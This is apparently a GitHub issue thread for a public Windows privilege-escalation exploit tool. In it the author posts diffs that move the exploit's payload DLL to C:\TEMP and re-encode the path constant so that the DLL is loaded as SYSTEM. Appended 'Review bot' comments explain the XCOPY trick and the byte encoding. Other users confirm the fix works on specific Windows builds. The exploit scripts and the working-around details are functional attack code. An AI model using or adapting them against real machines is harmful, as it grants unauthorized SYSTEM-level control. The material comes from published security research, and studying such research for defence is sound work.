handle unwritable temp dir #2

Closed
taviso opened this issue Aug 13, 2019 · 5 comments

Comments

@taviso
Owner

taviso commented Aug 13, 2019

A comment on Twitter says that on some systems C:\Windows\Temp is not writable, but he got the exploit working using C:\Temp instead.

https://twitter.com/matteomalvica/status/1161378715663831040

I should probably handle this in my script.

@taviso
Owner Author

taviso commented Aug 13, 2019

I think I will just need to do:

run CMD /C MKDIR C:\TEMP
run CMD /C COPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL

Then update the path accordingly; this is the relevant line in ctf-exploit-common-win10.ctf:

# And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
set r2 0x5c504d45545c2e2e

@taviso
Owner Author

taviso commented Aug 13, 2019

Even easier:

run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

This seems to work, testing on a few VMs now:

diff --git a/scripts/ctf-consent-system.ctf b/scripts/ctf-consent-system.ctf
index ded81b7..fcc7a6e 100644
--- a/scripts/ctf-consent-system.ctf
+++ b/scripts/ctf-consent-system.ctf
@@ -5,14 +5,14 @@

 print Attempting to copy exploit payload...

-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

 # Print a warning if that didnt work.
 repeat rc print
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-repeat rc print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!! THIS EXPLOIT REQUIRES C:\TEMP\EXPLOIT.DLL TO EXIST !!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 repeat rc print

 print
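Review bot: the `+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*` line relies on a non-obvious XCOPY behaviour (the trailing `*` makes XCOPY treat the destination as a file name and create the missing C:\TEMP directory), and nothing in the hunk says so; the `+#` comment above it should document that, because the old line used `%SYSTEMROOT%\TEMP`, which already existed, whereas this one silently creates a new root-level directory with default ACLs that the DLL loaded as SYSTEM then lives in. Note also that the `repeat rc` warning only fires when the copy itself fails, so an already-existing C:\TEMP with unexpected permissions will not be reported.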
diff --git a/scripts/ctf-exploit-common-win10.ctf b/scripts/ctf-exploit-common-win10.ctf
index 98af118..e06af18 100644
--- a/scripts/ctf-exploit-common-win10.ctf
+++ b/scripts/ctf-exploit-common-win10.ctf
@@ -420,7 +420,7 @@ repeat r1 callstub 0 0 r3
 print Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...

 # And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
-set r2 0x5c504d45545c2e2e
+set r2 0x5c504d45545c3a43

 patch 0 0xa8 r0 8 -0x120
 set r1 r2
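Review bot: the context lines `print Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...` and `# And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.` still describe the old path, while the new constant `0x5c504d45545c3a43` is the little-endian encoding of `C:\TEMP\` (bytes 43 3a 5c 54 45 4d 50 5c) replacing `..\TEMP\` (2e 2e 5c 54 45 4d 50 5c); update both the log message and the comment so they match what is actually loaded, and state in the comment how the 8-byte immediate is derived so the next path change is not done by hand.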
diff --git a/scripts/ctf-logonui-system.ctf b/scripts/ctf-logonui-system.ctf
index 5d28dcc..b2dca0d 100644
--- a/scripts/ctf-logonui-system.ctf
+++ b/scripts/ctf-logonui-system.ctf
@@ -5,8 +5,8 @@

 print Attempting to copy exploit payload...

-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

 # Print a warning if that didnt work.
 repeat rc print
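Review bot: this hunk applies the same two-line change as ctf-consent-system.ctf, but its context stops at the first `repeat rc print`, so the warning lines that the other file updated from `C:\WINDOWS\TEMP\EXPLOIT.DLL` to `C:\TEMP\EXPLOIT.DLL` are not shown here; confirm they were changed in this file too, otherwise the failure message will point users at the wrong path.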

@taviso
Owner Author

taviso commented Aug 13, 2019

Hmm OK, let's do it.

Maybe I should use C:\CTFTOOL, but I'll wait and see if anyone says this doesn't work first.

@taviso taviso closed this as completed in 28083e3 Aug 13, 2019
@uf0o

uf0o commented Aug 14, 2019

As a note, the build where I experienced the issue was 18362.267.

@niemand-sec

Yep, same issue in Windows 1607. I also fixed it by doing this #2 (comment)
